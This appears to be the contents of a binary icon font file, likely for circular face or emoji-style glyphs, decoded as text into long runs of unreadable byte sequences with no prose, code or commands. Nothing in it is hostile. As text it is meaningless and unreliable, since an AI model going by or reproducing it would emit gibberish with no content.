` �`)?L%1".54>32'2>54.#"310>7>101'2764'&"V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PDbcL!17bcL!17q66 Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<<71!Lcb71!Lcb66` �`)>Ta%1".54>32'2>54.#"352>54.#"310>7>101'2764'&"V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�IDbcL!17bcL!17q66 Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`771!Lcb71!Lcb66� �@)>KZix�%1".54>32'2>54.#"310>7>10'2764'&""326=4&#4&+";26526=4&#"3;2654&+"S�l??l�SS�l??l�SL�d::d�LL�d::d�L9Z[E"07Z[E"07[(("	
	
Q	a
	a	��	
	
��	a
	a	 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:770"E[Z70"E[Z((r	`		`	��

		��	a		a	R		

	� �@)>S`o~��%1".54>32'2>54.#"352>54.#"310>7>10'2764'&"12#"&=461+"&546;21"&=4632146;2+"&S�l??l�SS�l??l�SL�d::d�LL�d::d�LFz[55[zFFz[55[zF9Z[E"07Z[E"07[(("
	
	8	a	
a	��
	
	��	a	
a	 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d: 5[zFFz[55[zFFz[570"E[Z70"E[Z((R	`		`	��		

��	a		a	2

		� �@)>M\kz�%1".54>32'2>54.#"310>7>10"326=4&#4&+";26526=4&#"3;2654&+"%10>7'S�l??l�SS�l??l�SL�d::d�LL�d::d�L9Z[E"07Z[E"079	
	
Q	a
	a	��	
	
��	a
	a	/
&#.=;C ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:770"E[Z70"E[Z�	`		`	��

		��	a		a	R		

!
;</$%
D	� �@)>Sbq���%1".54>32'2>54.#"352>54.#"310>7>1012#"&=461+"&546;21"&=4632146;2+"&%10>7'S�l??l�SS�l??l�SL�d::d�LL�d::d�LFz[55[zFFz[55[zF9Z[E"07Z[E"079
	
	8	a	
a	��
	
	��	a	
a	
&#.=;C ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d: 5[zFFz[55[zFFz[570"E[Z70"E[Zi	`		`	��		

��	a		a	2

		(
;</$%
D` �`)?K%1".54>32'2>54.#"310>7>101'10>7'V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PDbcL!17bcL!17p(#4EDZ Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i<<71!Lcb71!LcbqED4#([` �`)>T`%1".54>32'2>54.#"352>54.#"310>7>101'10>7'V�qAAq�VV�qAAq�VP�i<<i�PP�i<<i�PI�`77`�II�`77`�IDbcL!17bcL!17p(#4EDZ Aq�VV�qAAq�VV�qA <i�PP�i<<i�PP�i< 7`�II�`77`�II�`771!Lcb71!LcbqED4#([`����'%4&#"32654&7#"&54674632@%%#K55K##^BB^#8((8�Q&%��:$5KK5$:"C'B^^B'C@(88(@����0%4&#"32654&7#"&54674&546329@%%#K55K#"#pPPp#K55K�Q&%��:$5KK5$:2K+PppP+K 5KK5��`����'4%4&#"32654&7#"&546746322654&#"3@%%#K55K##^BB^#8((8`(88((88(�Q&%��:$5KK5$:"C'B^^B'C@(88(��8((88((8@����0=%4&#"32654&7#"&54674&5463292654&#"3@%%#K55K#"#pPPp#K55K(88((88(�Q&%��:$5KK5$:2K+PppP+K 5KK5���8((88((8`����/C%#"&5467<=4632174&#"32654&7#"&54674632 $8((8$

 %%#K55K##^BB^#8((8�
2(88(2
�

�Q&%��:$5KK5$:"C'B^^B'C@(88(@����/L%#"&5467<=4632174&#"32654&7#"&54674&546329 $8((8$

 %%#K55K#"#pPPp#K55K�
2(88(2
�

�Q&%��:$5KK5$:2K+PppP+K 5KK5��`����/C%#"&5467<54632174&#"32654&7#"&54674632 $8((8$

 %%#K55K##^BB^#8((8�
2(88(2
@

��Q&%��:$5KK5$:"C'B^^B'C@(88(@����/L%#"&5467<54632174&#"32654&7#"&54674&546329 $8((8$

 %%#K55K#"#pPPp#K55K�
2(88(2
@

��Q&%��:$5KK5$:2K+PppP+K 5KK5��`����/C%#"&5467<54632174&#"32654&7#"&54674632 $8((8$

 %%#K55K##^BB^#8((8�
2(88(2
�

� Q&%��:$5KK5$:"C'B^^B'C@(88(@����/L%#"&5467<54632174&#"32654&7#"&54674&546329 $8((8$

 %%#K55K#"#pPPp#K55K�
2(88(2
�

� Q&%��:$5KK5$:2K+PppP+K 5KK5��`����.B%#"&5467<5463274&#"32654&7#"&54674632 $8((8$

 %%#K55K##^BB^#8((8�
2(88(2
`

��Q&%��:$5KK5$:"C'B^^B'C@(88(@����.K%#"&5467<5463274&#"32654&7#"&54674&546329 $8((8$

 %%#K55K#"#pPPp#K55K�
2(88(2
`

��Q&%��:$5KK5$:2K+PppP+K 5KK5��`���7#37##33"1}IR/�QqQ`�0p������`���`���#33�Q`�0p���������r�FWer10&'9'1067.'17.'10#"&1'&>7>7>32903261*#*97.10>3212654&#"3LbfgF
�WXzP
�^W;Mfk"$$"kgM;V_	

b

%%&&�+*P3
	.?E2$	
%ED8)/�  �/)8DE %tnNNnt% n�*

ּko�W�%%%%���r�+=J.'10#"&1'&>73265<'9'.#">3212654&#"3h^W;Mfk"$$"kgM;V_9'(8#

	
<%%&&.ED8)/�  �/)8DE(88(=%tnNNnt%

�%%%%��@�7#&'&4?#"&546;'&476213'"+"&546;'&4762546325./&47>5463276#7&4=463276232+"&'13>?6232+/.51#:;2+"/#"&=<7'"/#"&="'&4?2675#"&="'&4?#"&546;231�J�.

.�I@		'

	J.
	

.J	

'		@I�.



.�J@		&

	J-
	

.J
	
'

AVJ.
	
-J	

&		@I�-



-�IA

&
	
J-	

.J	

(		@J�.



.�JA		'
	
�@� 7#&'&4?#"&546;'&476213'"+"&546;'&4762546325./&47>5463276#7&4=463276232+"&'13>?6232+/.51#:;2+"/#"&=<7'"/#"&="'&4?2675#"&="'&4?#"&546;2312>54.#"3�J�.

.�I@		'

	J.
	

.J	

'		@I�.



.�J@		&

	J-
	

.J
	
'

AqL�d::d�LL�d::d�LVJ.
	
-J	

&		@I�-



-�IA

&
	
J-	

.J	

(		@J�.



.�JA		'
	
��:d�LL�d::d�LL�d:	� �@)6CP]jw{%1".54>32'2>54.#"31"&54632'2654&#"31"&54632'2654&#"3%2654&#"3!2654&#"335S�l??l�SS�l??l�SL�d::d�LL�d::d�L�(88((88(%%%% (88((88(%%%%��



 



� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�8((88((8 %%%% 8((88((8 %%%% 







�  � �@+7CO[_%".54>322654&#"7"&546322654&#"7"&54632%2654&#"!2654&#"35S�l??l�SS�l??l��(88((88(%%%%(88((88(%%%%��


-


Ӡ ?l�SS�l??l�SS�l?�8((88((8 %%%% 8((88((8 %%%% 







�  
� �@)6CP]jw��%1".54>32'2>54.#"31"&54632'2654&#"31"&54632'2654&#"3%2654&#"3!2654&#"31"&54632'2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L�(88((88(%%%% (88((88(%%%%��



 



�!//!!//! ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�8((88((8 %%%% 8((88((8 %%%% 







��/!!//!!/ � �@+7CO[g%".54>322654&#"7"&546322654&#"7"&54632%2654&#"!2654&#"2654&#"S�l??l�SS�l??l��(88((88(%%%%(88((88(%%%%��


-


�!//!!// ?l�SS�l??l�SS�l?�8((88((8 %%%% 8((88((8 %%%% 







��/!!//!!/	� �@?Tan{���'>32.#"#.#"3265133265<57#".54672>54.#"31"&54632!1"&54632%2654&#"3!2654&#"31"&54632'2654&#"3*OBO[00[OBO.2
j
2.
8((8`8((8U:d�LL�d:ES�l??l�SS�l??l�S�%%%%%%%%��



 



�!//!!//!J/%>,,>%/$$ (88((88(3'W/L�d::d�L/W'��?l�SS�l??l�SS�l?�%%%%%%%% 







��/!!//!!/ � �@@LXdp|>323>3217.#"813265133265817#".5467"&54632!"&54632%2654&#"!2654&#"2654&#"&02
j
20jIWd66dWIj8((8`8((8t?l�SS�l?�%%%%%%%%��


-


�!//!!//B#$$#@+F22F+@"(88((88(F)\1S�l??l�S1\)�%%%%%%%% 







��/!!//!!/� �@)6C%1".54>32'2>54.#"32654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







� �@+%".54>322654&#"!2654&#"S�l??l�SS�l??l��


-


 ?l�SS�l??l�SS�l?�







� �@)6CG%1".54>32'2>54.#"32654&#"3!2654&#"3!5S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



��  ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�  � �@+/%".54>322654&#"!2654&#"!5S�l??l�SS�l??l��


-


��  ?l�SS�l??l�SS�l?�







�  � �@)6CR%1".54>32'2>54.#"32654&#"3!2654&#"3"&10326150#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�S\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�@ @@ @� �@+9%".54>322654&#"!2654&#""&10326150S�l??l�SS�l??l��


-


�S\\ST]] ?l�SS�l??l�SS�l?�







�@ @@ @� �@)6CR%1".54>32'2>54.#"32654&#"3!2654&#"3"15063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�S\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�@ @@ @� �@+9%2>54.#""&54632!"&54632"15063210&S�l??l�SS�l??l�=





�S\\ST]] ?l�SS�l??l�SS�l?�







�@ @@ @� �@)6CP]%1".54>32'2>54.#"32654&#"3!2654&#"31"&54632'2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�!//!!//! ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







��/!!//!!/ � �@+7%".54>322654&#"!2654&#"2654&#"S�l??l�SS�l??l��


-


�!//!!// ?l�SS�l??l�SS�l?�







��/!!//!!/� �@)6CP]%1".54>32'2>54.#"32654&#"3!2654&#"31"&54632'2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�<TT<<TT<.BB..BB. ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







��/!!//!!/ � �@+7%".54>322654&#"!2654&#"2654&#"S�l??l�SS�l??l��


-


�<TT<<TT ?l�SS�l??l�SS�l?�







��/!!//!!/� �@)6:I%1".54>32'2>54.#"32654&#"3%35326=30+5S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



���_ (� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�



   ��( � �@".2%2>54.#"7326=30+5"&54632%3#S�l??l�SS�l??l�4_ (� 


���� ?l�SS�l??l�SS�l?�( 



  � �@)6CNU%1".54>32'2>54.#"32654&#"3!2654&#"3!0#".03261S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



���3_NN^3+PvuO ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�<H<<H< ��� �@+6%".54>322654&#"!2654&#"032>1S�l??l�SS�l??l��


-


��3_NN^3 ?l�SS�l??l�SS�l?�







�<H<<H<� �@)4;?C%1".54>32'2>54.#"3!0#".0326135335S�l??l�SS�l??l�SL�d::d�LL�d::d�L��3_NN^3+PvuO�k��� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d: <H<<H< ��    � �@"&%".54>32032>1%35335S�l??l�SS�l??l���3_NN^3�@��� ?l�SS�l??l�SS�l?@<H<<H<�    � �@,AP2#"&5#5!2#"&5#51".54>32'2>54.#"3'326=30+5�


@@


@0S�l??l�SS�l??l�SL�d::d�LL�d::d�L_ (�@


 


 ��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�( � �@+:2#"&5#5!2#"&5#52>54.#"7326=30+5�


@@


@0S�l??l�SS�l??l�4_ (�@


 


 ��?l�SS�l??l�SS�l?�( � �@)-15%1".54>32'2>54.#"3'!5737'S�l??l�SS�l??l�SL�d::d�LL�d::d�L� ��j�j ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�  AHH� �@%".54>32!5737'S�l??l�SS�l??l�� ��j�j ?l�SS�l??l�SS�l?  AHH� �@)-15%1".54>32'2>54.#"3'!535335S�l??l�SS�l??l�SL�d::d�LL�d::d�L� ����� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�       � �@%".54>32!535335S�l??l�SS�l??l�� ����� ?l�SS�l??l�SS�l?       � �@)-1@%1".54>32'2>54.#"335335"15063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���S\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:    ��@ @@ @� �@)%2>54.#"3#%3#"15063210&S�l??l�SS�l??l�}�� ��QS\\ST]] ?l�SS�l??l�SS�l?    �@ @@ @� �@)-1@%1".54>32'2>54.#"335335"&10326150#S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���S\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:    ��@ @@ @� �@)%".54>3235335"&10326150S�l??l�SS�l??l��݀���S\\ST]] ?l�SS�l??l�SS�l?     ��@ @@ @� �@)8<@MZ%1".54>32'2>54.#"3'"&10326150#7!7'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�LS\\ST]]T�j�$j



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�@ @@ @�HH�







� �@!%)5A%".54>32'"&103261507!7'2654&#"!2654&#"S�l??l�SS�l??l�TS\\ST]]1j�$j


-


 ?l�SS�l??l�SS�l?�@ @@ @�HH�







� �@)-1>%1".54>32'2>54.#"335335"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�    � `` � �@'%".54>3235335"&1032610S�l??l�SS�l??l��݀���HH<TT<H ?l�SS�l??l�SS�l?    � `` � �@)8<@MZ%1".54>32'2>54.#"3'"15063210&#7!7'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�LS\\ST]]T�j�$j



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�@ @@ @aHH�







� �@!%)5A%".54>322150&#"1067!7'2654&#"!2654&#"S�l??l�SS�l??l�TT]]TS\\�j�$j


-


 ?l�SS�l??l�SS�l?@ @@ @aHH�







� �@)-15BO%1".54>32'2>54.#"3'!57!7'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L� j�$j



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�  aHH�







� �@+7%".54>32!57!7'2654&#"!2654&#"S�l??l�SS�l??l�� j�$j


-


 ?l�SS�l??l�SS�l?  aHH�







� �@)-15BO%1".54>32'2>54.#"3'!5737'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L� ��jdj��



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�  aHH�







� �@+7%".54>32!5737'2654&#"!2654&#"S�l??l�SS�l??l�� ��jdj��


-


 ?l�SS�l??l�SS�l?  aHH�







� �@)6CPTX%1".54>32'2>54.#"35"1063210&#'2654&#"3!2654&#"3'35!35S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HH�



 



@��`� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` �







�    � �@+7;?%2>54.#"7"1063210&'"&54632!"&54632'3#%3#S�l??l�SS�l??l�SHH<TT<H�





M���� ?l�SS�l??l�SS�l?� `` �







�   � �@)6:G%1".54>32'2>54.#"32654&#"3%35"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



���0HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�



   � `` � �@#/%".54>322654&#"%35"&1032610S�l??l�SS�l??l�=


�̀0HH<TT<H ?l�SS�l??l�SS�l?�



   � `` � �@)6:>KX%1".54>32'2>54.#"35"1063210&#737'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HH�jdj��



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` �HH�







� �@#'3?%".54>32'210&#"106737'2654&#"!2654&#"S�l??l�SS�l??l�SHH<TT<HTjdj��


-


 ?l�SS�l??l�SS�l?� `` �HH�







� �@)6CP%1".54>32'2>54.#"32654&#"3!2654&#"3"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







� `` � �@+7%".54>322654&#"!2654&#""&1032610S�l??l�SS�l??l��


-


�HH<TT<H ?l�SS�l??l�SS�l?�







� `` � �@)6CP%1".54>32'2>54.#"32654&#"3!2654&#"3"1063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







� `` � �@+7%2>54.#""&54632!"&54632"1063210&S�l??l�SS�l??l�=





�HH<TT<H ?l�SS�l??l�SS�l?�







� `` � �@)6CPTX%1".54>32'2>54.#"35"&1032610#'2654&#"3!2654&#"3'35!35S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HH�



 



@��`� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` �







�    � �@+7;?%".54>32"&1032610'2654&#"!2654&#"'35!35S�l??l�SS�l??l�SHH<TT<H�


-


3��`� ?l�SS�l??l�SS�l? `` �







�    � �@)6:>KX%1".54>32'2>54.#"35"&1032610#7!7'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HH�j�$j



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` aHH�







� �@#'3?%".54>32"&10326107!7'2654&#"!2654&#"S�l??l�SS�l??l�SHH<TT<H<j�$j


-


 ?l�SS�l??l�SS�l? `` aHH�







� �@)6CPTX%1".54>32'2>54.#"32654&#"3!2654&#"3"1063210&#7!7'S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�HH<TT<HH�j�$j ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







� `` �HH� �@+7;?%".54>322654&#"!2654&#"210&#"1067!7'S�l??l�SS�l??l��


-


�HH<TT<H�j�$j ?l�SS�l??l�SS�l?�







� `` �HH� �@!6CPY326=35!1".54>32'2>54.#"32654&#"3!2654&#"33#"&5�B..B@���S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�/!!/@P.BB.P  ��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�P!//!� �@ ,8A#5!##"&52>54.#""&54632!"&54632326=�@`@B..BpS�l??l�SS�l??l�=





�/!!/@  P.BB.�?l�SS�l??l�SS�l?�







�P!//!P� �@!6CLP326=35!1".54>32'2>54.#"32654&#"33#"&535�B..B@���S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



�/!!/`�@P.BB.P  ��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�



�P!//!0  � �@ ,59#5!##"&52>54.#""&54632326=%3#�@`@B..BpS�l??l�SS�l??l��


�/!!/���@  P.BB.�?l�SS�l??l�SS�l?�



�P!//!P� � �@)6CV%1".54>32'2>54.#"32654&#"3!2654&#"3".#"#23263"&#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



P4$PGFS$4 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�0``0� �@+=%".54>322654&#"!2654&#"".#"#23263"&S�l??l�SS�l??l��


-


C4$PGFS$4 ?l�SS�l??l�SS�l?�







�0``0� �@
#*?Tan}��#5;2#5#5353#'#5#53'#>;#"&'131".54>32'2>54.#"32654&#"3!2654&#"3"3!2654&#!35!35`@`= @@ =�@@@@`==pS�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



��!//!!//!�Ѐ�`�@   `   `  ` @ `�?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�/!!//!!/     
� �@
#*>JVZ^#5;2#5#5353#'#5#53'#>;#"&'132>54.#""&54632!"&54632'3#%3#`@`= @@ =�@@@@`==pS�l??l�SS�l??l�=





M����@   `   `  ` @ `�?l�SS�l??l�SS�l?�







�   � �@
#*?Tan}��#5;2#5#5353#'#5#53'#>;#"&'131".54>32'2>54.#"32654&#"3!2654&#"3"3!2654&#!'#'7`@`= @@ =�@@@@`==pS�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



��!//!!//!�jdj@   `   `  ` @ `�?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�/!!//!!/!HH
� �@
#*>JVZ^#5;2#5#5353#'#5#53'#>;#"&'132>54.#""&54632!"&54632''#'7`@`= @@ =�@@@@`==pS�l??l�SS�l??l�=





jdj@   `   `  ` @ `�?l�SS�l??l�SS�l?�







�HH� �@
#*?Tan}��#5;2#5#5353#'#5#53'#>;#"&'131".54>32'2>54.#"32654&#"3!2654&#"3"3!2654&#!7!7'`@`= @@ =�@@@@`==pS�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



��!//!!//!�j�$j@   `   `  ` @ `�?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�/!!//!!/!HH
� �@#/37=AEKW["32>54.7#"&'35#>;'"&54632#535#53;2##535#53#53"&546327'7S�l??l�SS�l??l���jjl== 


s@@@@�= @@@@0=


?jj@?l�SS�l??l�SS�l?��GH�� �



�   @   ` 



?GG
� �@
#*?Tan}#5;2#5#5353#'#5#53'#>;#"&'131".54>32'2>54.#"32654&#"3!2654&#"3"3!2654&#!`@`= @@ =�@@@@`==pS�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



��!//!!//!�@   `   `  ` @ `�?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�/!!//!!/� �@
#*>JV#5;2#5#5353#'#5#53'#>;#"&'132>54.#""&54632!"&54632`@`= @@ =�@@@@`==pS�l??l�SS�l??l�=





@   `   `  ` @ `�?l�SS�l??l�SS�l?�







� �@)6CP]ae%1".54>32'2>54.#"32654&#"3!2654&#"31"&54632'2654&#"335!35S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�!//!!//!P��`� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







��/!!//!!/ �    � �@+7;?%".54>322654&#"!2654&#"2654&#"35!35S�l??l�SS�l??l��


-


�!//!!//q��`� ?l�SS�l??l�SS�l?�







��/!!//!!/�    � �@)6CP]ae%1".54>32'2>54.#"32654&#"3!2654&#"31"&54632'2654&#"37!7'S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�!//!!//!�j�$j ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







��/!!//!!/ �HH� �@+7;?%".54>322654&#"!2654&#"2654&#"7!7'S�l??l�SS�l??l��


-


�!//!!//�j�$j ?l�SS�l??l�SS�l?�







��/!!//!!/�HH� �@)6CP]ae%1".54>32'2>54.#"32654&#"3!2654&#"31"&54632'2654&#"3'#'7S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�!//!!//!�jdj ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







��/!!//!!/ �HH� �@+7;?%".54>322654&#"!2654&#"2654&#"7'S�l??l�SS�l??l��


-


�!//!!//�jj�jj ?l�SS�l??l�SS�l?�







��/!!//!!/�HH.HH� �@)6=D%1".54>32'2>54.#"35"1063210&#7'7%'7'7S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HH�[[DD��[[DD ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` �[ZCD�Z[DC� �@&-%2>54.#"7"1063210&7'7%'7'7S�l??l�SS�l??l�SHH<TT<HZ[[DD��[[DD ?l�SS�l??l�SS�l?� `` �[ZCD�Z[DC� �@)8?F%1".54>32'2>54.#"3'"15063210&#7'7%'7'7S�l??l�SS�l??l�SL�d::d�LL�d::d�LS\\ST]]T�[[DD��[[DD ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�@ @@ @�[ZCD�Z[DC� �@!(/%2>54.#""15063210&7'7%'7'7S�l??l�SS�l??l�RS\\ST]]O[[DD��[[DD ?l�SS�l??l�SS�l?@ @@ @�[ZCD�Z[DC� �@)-1>K^%1".54>32'2>54.#"335!352654&#"3!2654&#"3".#"#23263"&#S�l??l�SS�l??l�SL�d::d�LL�d::d�LP��`�@



 



P4$PGFS$4 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:@    �







�0``0� �@'3E%".54>3235!352654&#"!2654&#"".#"#23263"&S�l??l�SS�l??l���`�@


-


C4$PGFS$4 ?l�SS�l??l�SS�l?`    �







�0``0� �@)-1@%1".54>32'2>54.#"3737'"15063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�j�j�S\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH��@ @@ @� �@)%2>54.#"'7"15063210&S�l??l�SS�l??l�ijj jjeS\\ST]] ?l�SS�l??l�SS�l?AHH.HH�@ @@ @� �@)-1>%1".54>32'2>54.#"335335"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�    � `` � �@'%".54>3235335"&1032610S�l??l�SS�l??l��݀���HH<TT<H ?l�SS�l??l�SS�l?    � `` � �@)-1>%1".54>32'2>54.#"3737'"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�j�j�HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH�� `` � �@'%".54>32737'"&1032610S�l??l�SS�l??l���j�j�HH<TT<H ?l�SS�l??l�SS�l?AHH�� `` � �@)-1>%1".54>32'2>54.#"37!7'"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�Ldj�djdHH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH�� `` � �@'%".54>327!7'"&1032610S�l??l�SS�l??l�j�djdHH<TT<H ?l�SS�l??l�SS�l?AHH�� `` � �@)-1>K%1".54>32'2>54.#"3353351"&54632'2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���!//!!//! ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�    ��/!!//!!/ � �@'%".54>32353352654&#"S�l??l�SS�l??l��݀���!//!!// ?l�SS�l??l�SS�l?    ��/!!//!!/� �@)6CGK%1".54>32'2>54.#"351"&54632'2654&#"37!7'S�l??l�SS�l??l�SL�d::d�LL�d::d�L!//!!//!dj�dj ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�/!!//!!/ �HH� �@#'%".54>32'2654&#"7!7'S�l??l�SS�l??l�S!//!!//�j�dj ?l�SS�l??l�SS�l?�/!!//!!/�HH� �@)-1>K%1".54>32'2>54.#"3737'1"&54632'2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L�j�j�!//!!//! ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH�_/!!//!!/ � �@'%".54>32737'2654&#"S�l??l�SS�l??l���j�j�!//!!// ?l�SS�l??l�SS�l?AHH�_/!!//!!/� �@)07BI%1".54>32'2>54.#"37''!7''!0#".03261S�l??l�SS�l??l�SL�d::d�LL�d::d�LE[[DD��[[DD�3_NN^3+PvuO ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�ZZDDZZDD�<H<<H< ��� �@!,%".54>3277'!77'032>1S�l??l�SS�l??l�DD[[��DD[[3_NN^3 ?l�SS�l??l�SS�l?�DDZZDDZZ�<H<<H<� �@)8?F%1".54>32'2>54.#"3'"&10326150#7''!7''S�l??l�SS�l??l�SL�d::d�LL�d::d�LS\\ST]]TF[[DD��[[DD ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�@ @@ @ZZDDZZDD� �@!(/%2>54.#"72610#"&1507''!7''S�l??l�SS�l??l�RT]]TS\\�[[DD��[[DD ?l�SS�l??l�SS�l?�@ @@ @ZZDDZZDD� �@)6=D%1".54>32'2>54.#"35"&1032610#?''!7''S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HHE[[DD��[[DD ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` �ZZDDZZDD� �@&-%2>54.#"2610#"&10?''!7''S�l??l�SS�l??l�SHH<TT<H�[[DD��[[DD ?l�SS�l??l�SS�l? `` �ZZDDZZDD� �@)-1>%1".54>32'2>54.#"3737'"1063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�j�j�HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH�� `` � �@'%2>54.#"'7"1063210&S�l??l�SS�l??l�ijj jjdHH<TT<H ?l�SS�l??l�SS�l?AHH.HH� `` � �@)-1>%1".54>32'2>54.#"37!7'"1063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�Ldj�djdHH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH�� `` � �@'%2>54.#"'7"1063210&S�l??l�SS�l??l��jj��jj�HH<TT<H ?l�SS�l??l�SS�l?AHH.HH� `` � �@)-1>%1".54>32'2>54.#"335335"1063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�    �� `` � �@'%2>54.#"3#%3#"1063210&S�l??l�SS�l??l�}�� ��PHH<TT<H ?l�SS�l??l�SS�l?   � `` � �@)-1@%1".54>32'2>54.#"37!7'"15063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�Ldj�djcS\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH��@ @@ @� �@)%2>54.#"'7"15063210&S�l??l�SS�l??l��jj��jj�S\\ST]] ?l�SS�l??l�SS�l?AHH.HH�@ @@ @� 